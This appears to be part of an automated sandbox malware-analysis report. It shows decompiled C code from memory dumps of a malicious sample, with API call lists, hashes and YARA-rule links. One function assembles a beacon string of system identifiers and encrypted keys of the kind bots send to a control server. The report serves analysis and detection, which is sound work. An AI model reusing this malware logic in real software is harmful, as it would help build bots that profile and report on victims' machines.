									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x3c4d328 = 1;
										__eflags =  *0x3c4d328;
										if( *0x3c4d328 != 0) {
											goto L60;
										}
										_t84 =  *0x3c4d2e0; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x3c4d328 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x3c4d2e0 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x3c4d2e8 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x3c4d2e4 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x3c4d2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x3c4d2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x3c4d328 = 1;
							__eflags =  *0x3c4d328;
							if( *0x3c4d328 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x3c4d2e8 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x3c4d2e8 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x3c4d328 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x3c4d2e8 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x3c4d2e0 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x3c4d2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x3c4d2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x03c4b1ef
0x03c4b1f2
0x03c4b1f8
0x03c4b216
0x00000000
0x03c4b216
0x03c4b200
0x03c4b209
0x03c4b20f
0x03c4b21e
0x03c4b221
0x03c4b224
0x03c4b22e
0x03c4b22e
0x03c4b230
0x03c4b233
0x03c4b235
0x03c4b235
0x03c4b237
0x03c4b23a
0x00000000
0x00000000
0x03c4b23c
0x03c4b23e
0x03c4b2a4
0x03c4b2a4
0x03c4b402
0x00000000
0x03c4b402
0x03c4b240
0x03c4b240
0x03c4b244
0x03c4b246
0x03c4b246
0x03c4b246
0x03c4b246
0x03c4b249
0x03c4b24a
0x03c4b24d
0x03c4b24d
0x03c4b251
0x03c4b255
0x03c4b263
0x03c4b263
0x03c4b26b
0x03c4b271
0x03c4b273
0x03c4b275
0x03c4b285
0x03c4b292
0x03c4b296
0x03c4b29b
0x03c4b29d
0x03c4b31b
0x03c4b31b
0x03c4b29f
0x03c4b29f
0x03c4b29f
0x03c4b31d
0x03c4b31f
0x03c4b400
0x03c4b400
0x00000000
0x03c4b325
0x03c4b325
0x03c4b32c
0x00000000
0x00000000
0x03c4b332
0x03c4b336
0x03c4b392
0x03c4b394
0x03c4b39c
0x03c4b39e
0x03c4b3a0
0x00000000
0x00000000
0x03c4b3a2
0x03c4b3a8
0x03c4b3aa
0x03c4b3ac
0x03c4b3c1
0x03c4b3c1
0x03c4b3c3
0x03c4b3f2
0x03c4b3f9
0x00000000
0x03c4b3f9
0x03c4b3c7
0x03c4b3c8
0x03c4b3ca
0x03c4b3cc
0x03c4b3cc
0x03c4b3ce
0x03c4b3d0
0x03c4b3d2
0x03c4b3e6
0x03c4b3e6
0x03c4b3e9
0x03c4b3eb
0x03c4b3eb
0x03c4b3ec
0x03c4b3ec
0x00000000
0x03c4b3d4
0x03c4b3d4
0x03c4b3d4
0x03c4b3dd
0x03c4b3de
0x03c4b3e0
0x03c4b3e2
0x03c4b3e2
0x00000000
0x03c4b3d4
0x03c4b3d2
0x03c4b3ae
0x03c4b3b5
0x03c4b3b5
0x03c4b3b7
0x00000000
0x00000000
0x03c4b3b9
0x03c4b3ba
0x03c4b3bd
0x03c4b3bf
0x00000000
0x00000000
0x00000000
0x03c4b3bf
0x00000000
0x03c4b3b5
0x03c4b338
0x03c4b33b
0x03c4b340
0x00000000
0x00000000
0x03c4b349
0x03c4b34b
0x03c4b351
0x00000000
0x00000000
0x03c4b357
0x03c4b35d
0x00000000
0x00000000
0x03c4b363
0x03c4b365
0x03c4b36e
0x03c4b372
0x00000000
0x00000000
0x03c4b378
0x03c4b37b
0x03c4b37d
0x00000000
0x00000000
0x03c4b384
0x03c4b386
0x00000000
0x00000000
0x03c4b388
0x03c4b38c
0x00000000
0x00000000
0x00000000
0x03c4b38c
0x00000000
0x00000000
0x00000000
0x03c4b277
0x03c4b277
0x03c4b277
0x03c4b27e
0x00000000
0x00000000
0x03c4b280
0x03c4b281
0x03c4b283
0x00000000
0x00000000
0x00000000
0x03c4b283
0x03c4b2ab
0x03c4b2ad
0x00000000
0x00000000
0x03c4b2bd
0x03c4b2bf
0x03c4b2c1
0x00000000
0x00000000
0x03c4b2c7
0x03c4b2ce
0x03c4b2fa
0x03c4b2fa
0x03c4b2fc
0x03c4b2fe
0x03c4b312
0x03c4b314
0x00000000
0x00000000
0x00000000
0x00000000
0x03c4b300
0x03c4b300
0x03c4b300
0x03c4b309
0x03c4b30a
0x03c4b30c
0x03c4b30e
0x03c4b30e
0x00000000
0x03c4b300
0x03c4b2d0
0x03c4b2d0
0x03c4b2d3
0x03c4b2d5
0x03c4b2e7
0x03c4b2e7
0x03c4b2ea
0x03c4b2ec
0x03c4b2ec
0x03c4b2ed
0x03c4b2ed
0x03c4b2f3
0x03c4b2f3
0x00000000
0x00000000
0x00000000
0x00000000
0x03c4b2d7
0x03c4b2d7
0x03c4b2d7
0x03c4b2de
0x00000000
0x00000000
0x03c4b2e0
0x03c4b2e0
0x03c4b2e1
0x00000000
0x00000000
0x00000000
0x03c4b2e1
0x03c4b2e3
0x03c4b2e5
0x03c4b2f8
0x00000000
0x00000000
0x00000000
0x03c4b2f8
0x00000000
0x03c4b2e5
0x03c4b257
0x03c4b25a
0x03c4b25d
0x00000000
0x00000000
0x03c4b25f
0x03c4b261
0x00000000
0x00000000
0x00000000
0x03c4b261
0x03c4b226
0x03c4b228
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 03C4B296

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: cf9b73e33d9f15dd5867cd1a27803a0c311679eeb38dba23359ef51096c8027e
Instruction ID: 47eb892b6f11ca525b884f763dda944f803030f767654608e768b8fc9a0a13c2
Opcode Fuzzy Hash: cf9b73e33d9f15dd5867cd1a27803a0c311679eeb38dba23359ef51096c8027e
Instruction Fuzzy Hash: 8D61C531A006069FDB39DA2ED89472DB3B5EB85314F288569D8D6CB685E770EE42C680

Uniqueness

Uniqueness Score: -1.00%

Function 03C4AFC0, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E03C4AFC0(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E03C4B12B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E03C4B1E5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E03C4B0D0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E03C4B12B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E03C4B1C7(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x03c4afc4
0x03c4afc5
0x03c4afc6
0x03c4afc9
0x03c4afcb
0x03c4afce
0x03c4afcf
0x03c4afd1
0x03c4afd2
0x03c4afd3
0x03c4afd6
0x03c4afe0
0x03c4b091
0x03c4b098
0x03c4b0a1
0x03c4afe6
0x03c4afe6
0x03c4afec
0x03c4aff2
0x03c4aff5
0x03c4aff8
0x03c4affc
0x03c4b001
0x03c4b006
0x03c4b086
0x00000000
0x03c4b008
0x03c4b008
0x03c4b014
0x03c4b016
0x03c4b071
0x03c4b071
0x03c4b077
0x00000000
0x03c4b018
0x03c4b027
0x03c4b029
0x03c4b02a
0x03c4b02b
0x03c4b02e
0x03c4b02e
0x03c4b030
0x00000000
0x03c4b032
0x03c4b032
0x03c4b07c
0x03c4b034
0x03c4b034
0x03c4b038
0x03c4b040
0x03c4b045
0x03c4b04a
0x03c4b056
0x03c4b05e
0x03c4b065
0x03c4b06b
0x03c4b06f
0x00000000
0x03c4b06f
0x03c4b032
0x03c4b030
0x00000000
0x03c4b016
0x03c4b08a
0x03c4b08a
0x03c4b08a
0x03c4b006
0x03c4b0a6
0x03c4b0ad

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: 2cfd70fd8a49fd4b93d73b4f7a6b8f934a6374f0cdb2bfe04ac7579a9b2321ee
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: 1D2174769042049BCB14EF68C8809A7FBA5FF45350B0A8568DDA6DB245D730FE15CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 01FE0D90, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.517164137.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
Instruction ID: 44be5305264c1c082c32dbfab7422ef77d2950e2cc103fa733fa3f698377db17
Opcode Fuzzy Hash: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
Instruction Fuzzy Hash: 83F0C276B005049FDB22CF28CC09BAE73F9FB84215F0441A4E90AD7242DBB1F9428B50

Uniqueness

Uniqueness Score: -1.00%

Function 0042187E, Relevance: 47.7, APIs: 24, Strings: 3, Instructions: 431COMMON

Download Yara Rule

APIs

__invoke_watson_if_error.LIBCMTD ref: 004218C2
__invoke_watson_if_error.LIBCMTD ref: 00421AE3

Part of subcall function 00418D20: __invoke_watson.LIBCMTD ref: 00418D41

_wcscat_s.LIBCMTD ref: 00421ADA

Part of subcall function 004265C0: __invalid_parameter.LIBCMTD ref: 00426632

_wcscat_s.LIBCMTD ref: 00421B12

Part of subcall function 004265C0: _memset.LIBCMT ref: 0042669B
Part of subcall function 004265C0: __invalid_parameter.LIBCMTD ref: 004266F7

__invoke_watson_if_error.LIBCMTD ref: 00421B1B
__snwprintf_s.LIBCMTD ref: 00421B74

Part of subcall function 0041FE40: __vsnprintf_s_l.LIBCMTD ref: 0041FE62

__invoke_watson_if_oneof.LIBCMTD ref: 00421BAD
_wcscpy_s.LIBCMTD ref: 00421BF2
__invoke_watson_if_error.LIBCMTD ref: 00421BFB
__invoke_watson_if_oneof.LIBCMTD ref: 00421C9E
_wcscpy_s.LIBCMTD ref: 00421CD6
__invoke_watson_if_error.LIBCMTD ref: 00421CDF
__itow_s.LIBCMTD ref: 004218B9

Part of subcall function 004269A0: _xtow_s@20.LIBCMTD ref: 004269CB

__strftime_l.LIBCMTD ref: 00421979
__invoke_watson_if_oneof.LIBCMTD ref: 004219B2
_wcscpy_s.LIBCMTD ref: 004219F7
__invoke_watson_if_error.LIBCMTD ref: 00421A00
_wcscpy_s.LIBCMTD ref: 00421A53
__invoke_watson_if_error.LIBCMTD ref: 00421A5C
__invoke_watson_if_error.LIBCMTD ref: 00421A96

Strings

P.K, xrefs: 00421A8C
hxH@, xrefs: 00421A6B
h N@, xrefs: 00421A70

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __invoke_watson_if_error$_wcscpy_s$__invoke_watson_if_oneof$__invalid_parameter_wcscat_s$__invoke_watson__itow_s__snwprintf_s__strftime_l__vsnprintf_s_l_memset_xtow_s@20
String ID: P.K$h N@$hxH@
API String ID: 2137535789-2079250698
Opcode ID: 6cb56babc26bd87a4cca412cf3606fe082f590bf1dc2ccb8f87ef351cbd3a14a
Instruction ID: bc2b119c2c2d0a5ddc21f41d5b1e7511fdc2e21cd329a700cac81a7f540cf5cb
Opcode Fuzzy Hash: 6cb56babc26bd87a4cca412cf3606fe082f590bf1dc2ccb8f87ef351cbd3a14a
Instruction Fuzzy Hash: 5202E7B4A40318ABDB20EF50EC46FDF7375AB54705F5040AAF6087A2D1D7B89A84CF99

Uniqueness

Uniqueness Score: -1.00%

Function 03C45450, Relevance: 33.2, APIs: 22, Instructions: 244
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E03C45450(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x3c4d018; // 0x9428ee6e
				asm("bswap eax");
				_t61 =  *0x3c4d014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x3c4d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x3c4d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t64 =  *0x3c4d2a8; // 0xb0a5a8
				_t3 = _t64 + 0x3c4e633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3d163, _t63, _t62, _t61, _t60,  *0x3c4d02c,  *0x3c4d004, _t59);
				_t67 = E03C43288();
				_t68 =  *0x3c4d2a8; // 0xb0a5a8
				_t4 = _t68 + 0x3c4e673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E03C4831C(_t134);
				_t133 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x3c4d2a8; // 0xb0a5a8
					_t7 = _t126 + 0x3c4e8d4; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x3c4d238, 0, _v8);
				}
				_t73 = E03C49267();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x3c4d2a8; // 0xb0a5a8
					_t11 = _t121 + 0x3c4e8dc; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x3c4d238, 0, _v8);
				}
				_t146 =  *0x3c4d32c; // 0x47595b0
				_t75 = E03C4284E(0x3c4d00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x3c4d238, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x3c4d238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x3c4d238, _t152, _v20);
						goto L26;
					}
					E03C43239(GetTickCount());
					_t82 =  *0x3c4d32c; // 0x47595b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x3c4d32c; // 0x47595b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x3c4d32c; // 0x47595b0
					_t148 = E03C47B8D(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x3c4d238, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x3c4c28c);
					_push(_t148);
					_t94 = E03C4A677();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x3c4d238, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E03C47B3B( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E03C45433();
						L22:
						HeapFree( *0x3c4d238, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E03C49F33(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E03C4137B(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E03C48B22(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E03C47953(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E03C48B22(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}

0x03c45450
0x03c45450
0x03c45450
0x03c45459
0x03c45462
0x03c45464
0x03c45464
0x03c45471
0x03c4547c
0x03c4547f
0x03c45484
0x03c4548d
0x03c45490
0x03c45495
0x03c45498
0x03c4549d
0x03c454a0
0x03c454ac
0x03c454b9
0x03c454bb
0x03c454c1
0x03c454c6
0x03c454d1
0x03c454d3
0x03c454d6
0x03c454d8
0x03c454dd
0x03c454e3
0x03c454e8
0x03c454eb
0x03c454f0
0x03c454fd
0x03c454ff
0x03c45505
0x03c4550f
0x03c4550f
0x03c45511
0x03c45516
0x03c4551b
0x03c4551e
0x03c45523
0x03c45530
0x03c45532
0x03c45540
0x03c45540
0x03c45542
0x03c45550
0x03c45555
0x03c45557
0x03c4555c
0x03c4571d
0x03c45727
0x03c45730
0x03c45562
0x03c4556e
0x03c45574
0x03c45579
0x03c45711
0x03c4571b
0x00000000
0x03c4571b
0x03c45585
0x03c4558a
0x03c45593
0x03c455a4
0x03c455a8
0x03c455b1
0x03c455b7
0x03c455c6
0x03c455cd
0x03c455d6
0x03c455dc
0x03c45705
0x03c4570f
0x00000000
0x03c4570f
0x03c455e8
0x03c455ee
0x03c455ef
0x03c455f4
0x03c455f9
0x03c456fb
0x03c45703
0x00000000
0x03c45703
0x03c45602
0x03c45609
0x03c45611
0x03c45616
0x03c4561f
0x03c4562a
0x03c4562f
0x03c45634
0x03c45733
0x03c456e7
0x03c456e7
0x03c456ec
0x03c456f7
0x03c456f9
0x00000000
0x03c456f9
0x03c4563e
0x03c45643
0x03c45648
0x03c4564d
0x03c4565d
0x03c45660
0x03c45666
0x03c4566c
0x03c45672
0x03c45675
0x03c4567b
0x03c4567e
0x03c45683
0x03c45687
0x03c45687
0x03c45693
0x03c4569f
0x03c456a3
0x03c456a5
0x03c456aa
0x03c456ac
0x03c456b1
0x03c456b6
0x03c456c3
0x03c456cb
0x03c456ce
0x03c456ce
0x03c456aa
0x00000000
0x03c45695
0x03c45699
0x03c456d0
0x03c456d3
0x03c456dc
0x00000000
0x00000000
0x00000000
0x00000000
0x03c456dc
0x03c4569b
0x00000000
0x03c4569b
0x03c45693

APIs

GetTickCount.KERNEL32 ref: 03C45464
wsprintfA.USER32 ref: 03C454B4
wsprintfA.USER32 ref: 03C454D1
wsprintfA.USER32 ref: 03C454FD
HeapFree.KERNEL32(00000000,?), ref: 03C4550F
wsprintfA.USER32 ref: 03C45530
HeapFree.KERNEL32(00000000,?), ref: 03C45540
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03C4556E
GetTickCount.KERNEL32 ref: 03C4557F
RtlEnterCriticalSection.NTDLL(04759570), ref: 03C45593
RtlLeaveCriticalSection.NTDLL(04759570), ref: 03C455B1

Part of subcall function 03C47B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,03C49DA0,?,047595B0), ref: 03C47BB8
Part of subcall function 03C47B8D: lstrlen.KERNEL32(?,?,?,03C49DA0,?,047595B0), ref: 03C47BC0
Part of subcall function 03C47B8D: strcpy.NTDLL ref: 03C47BD7
Part of subcall function 03C47B8D: lstrcat.KERNEL32(00000000,?), ref: 03C47BE2
Part of subcall function 03C47B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,03C49DA0,?,047595B0), ref: 03C47BFF

StrTrimA.SHLWAPI(00000000,03C4C28C,?,047595B0), ref: 03C455E8

Part of subcall function 03C4A677: lstrlen.KERNEL32(04759BF8,00000000,00000000,74ECC740,03C49DCB,00000000), ref: 03C4A687
Part of subcall function 03C4A677: lstrlen.KERNEL32(?), ref: 03C4A68F
Part of subcall function 03C4A677: lstrcpy.KERNEL32(00000000,04759BF8), ref: 03C4A6A3
Part of subcall function 03C4A677: lstrcat.KERNEL32(00000000,?), ref: 03C4A6AE

lstrcpy.KERNEL32(00000000,?), ref: 03C45609
lstrcpy.KERNEL32(?,?), ref: 03C45611
lstrcat.KERNEL32(?,?), ref: 03C4561F
lstrcat.KERNEL32(?,00000000), ref: 03C45625

Part of subcall function 03C47B3B: lstrlen.KERNEL32(?,00000000,04759C18,00000000,03C45142,04759E3B,?,?,?,?,?,69B25F44,00000005,03C4D00C), ref: 03C47B42
Part of subcall function 03C47B3B: mbstowcs.NTDLL ref: 03C47B6B
Part of subcall function 03C47B3B: memset.NTDLL ref: 03C47B7D

wcstombs.NTDLL ref: 03C456B6

Part of subcall function 03C4137B: SysAllocString.OLEAUT32(?), ref: 03C413B6

Part of subcall function 03C48B22: RtlFreeHeap.NTDLL(00000000,00000000,03C4131A,00000000,?,?,00000000), ref: 03C48B2E

HeapFree.KERNEL32(00000000,?,?), ref: 03C456F7
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 03C45703
HeapFree.KERNEL32(00000000,?,?,047595B0), ref: 03C4570F
HeapFree.KERNEL32(00000000,?), ref: 03C4571B
HeapFree.KERNEL32(00000000,?), ref: 03C45727

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 3748877296-0
Opcode ID: 8278575820984f82d5cfa51b9a5204f8a8120e252ec473b45d5e9ad0aad45b22
Instruction ID: d146a4bdf3b89a16e6f6afab74f56f9297b478bc854c2be01b6255fdb1dc5c27
